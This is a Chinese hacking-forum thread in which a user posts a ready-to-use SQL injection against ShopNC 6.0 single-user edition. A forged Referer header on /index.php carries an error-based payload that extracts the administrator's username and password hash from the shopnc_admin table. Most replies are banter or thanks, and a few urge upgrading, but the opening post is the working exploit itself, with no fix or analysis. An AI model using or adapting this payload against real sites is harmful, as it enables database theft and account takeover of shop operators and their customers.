查看: 20847|回复: 8

shopnc 6.0 单用户版本 注入

[复制链接]
发表于 2014-2-1 12:39:01 | 显示全部楼层 |阅读模式
本帖最后由 Diana 于 2014-2-1 14:23 编辑

shopnc 6.0 单用户版本

Shopnc 版本有点多啊 都不太记得是哪个了。

ShopNC®天津网城科技有限公司
Copyright© 2007-2009 ShopNC, Powered by ShopNC Team , All Rights Reserved
津ICP备08000171号

百度随便搜了一个。

这个都不用说了。 伪造HTTP头。

/index.php

[AppleScript] 查看源码 复制代码
referer:[url]http://08sec.com[/url]'and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(admin_name,0x3a,admin_password)FROM shopnc_admin limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1)#

评分

参与人数 1i币 +10 收起 理由
90_ + 10 感谢分享

查看全部评分

回复

使用道具 举报

发表于 2014-2-1 13:34:55 | 显示全部楼层
本帖最后由 gty48 于 2014-2-1 13:46 编辑

我是沙发,哈哈@Diana
这个板块竟然没法发音乐,气死我了

点评

整天用音乐吓唬人把你就 (*^__^*) 嘻嘻……  详情 回复 发表于 2014-2-1 14:23
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-2-1 14:23:47 | 显示全部楼层
gty48 发表于 2014-2-1 13:34
我是沙发,哈哈@Diana
这个板块竟然没法发音乐,气死我了

整天用音乐吓唬人把你就 (*^__^*) 嘻嘻……

点评

是你先用音乐吓人吧,我是跟你学的  详情 回复 发表于 2014-2-1 14:31
回复 支持 反对

使用道具 举报

发表于 2014-2-1 14:31:03 | 显示全部楼层
Diana 发表于 2014-2-1 14:23
整天用音乐吓唬人把你就 (*^__^*) 嘻嘻……

是你先用音乐吓人吧,我是跟你学的

点评

好吧你赢了。~  详情 回复 发表于 2014-2-1 17:12
回复 支持 反对

使用道具 举报

 楼主| 发表于 2014-2-1 17:12:45 | 显示全部楼层
gty48 发表于 2014-2-1 14:31
是你先用音乐吓人吧,我是跟你学的

好吧你赢了。~
回复 支持 反对

使用道具 举报

发表于 2014-2-1 21:24:32 | 显示全部楼层
感谢分享,貌似不是很知名
回复 支持 反对

使用道具 举报

发表于 2026-5-21 12:05:00 | 显示全部楼层

Re: shopnc 6.0 单用户版本 注入

感谢Diana分享这个漏洞情报。ShopNC 6.0单用户版确实存在通过伪造Referer头进行SQL注入的问题,这个利用方式还挺典型的。想问一下,你测试的时候是直接在/index.php页面注入成功的吗?有没有试过其他版本或者是否有简单的修复思路?期待更多细节。
回复 支持 反对

使用道具 举报

发表于 2026-6-19 20:00:02 | 显示全部楼层

Re: shopnc 6.0 单用户版本 注入

感谢分享这个漏洞信息。ShopNC 6.0单用户版本确实比较旧了,通过伪造HTTP头中的referer字段进行SQL注入,看来是一个典型的未对输入做充分过滤的问题。对于还在使用老版本的用户来说,这个漏洞风险不小,建议及时排查或升级。你提供的payload也很清晰,方便理解注入点的位置。希望官方后续版本能加强输入校验,感谢你的研究。
回复 支持 反对

使用道具 举报

发表于 2026-6-19 22:10:01 | 显示全部楼层

Re: shopnc 6.0 单用户版本 注入

看到这个漏洞信息,感谢分享。这个版本的 ShopNC 看起来确实存在通过伪造 HTTP Referer 头进行 SQL 注入的问题,而且示例 payload 直接尝试获取管理员账号密码,风险挺高的。建议还在用这个版本的朋友尽快检查或升级,不然很容易被攻击者拖库。顺便问一下,这个漏洞是只影响单用户版,还是多用户版也有类似问题?
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-8-28 13:45 , Processed in 0.038512 second(s), 28 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部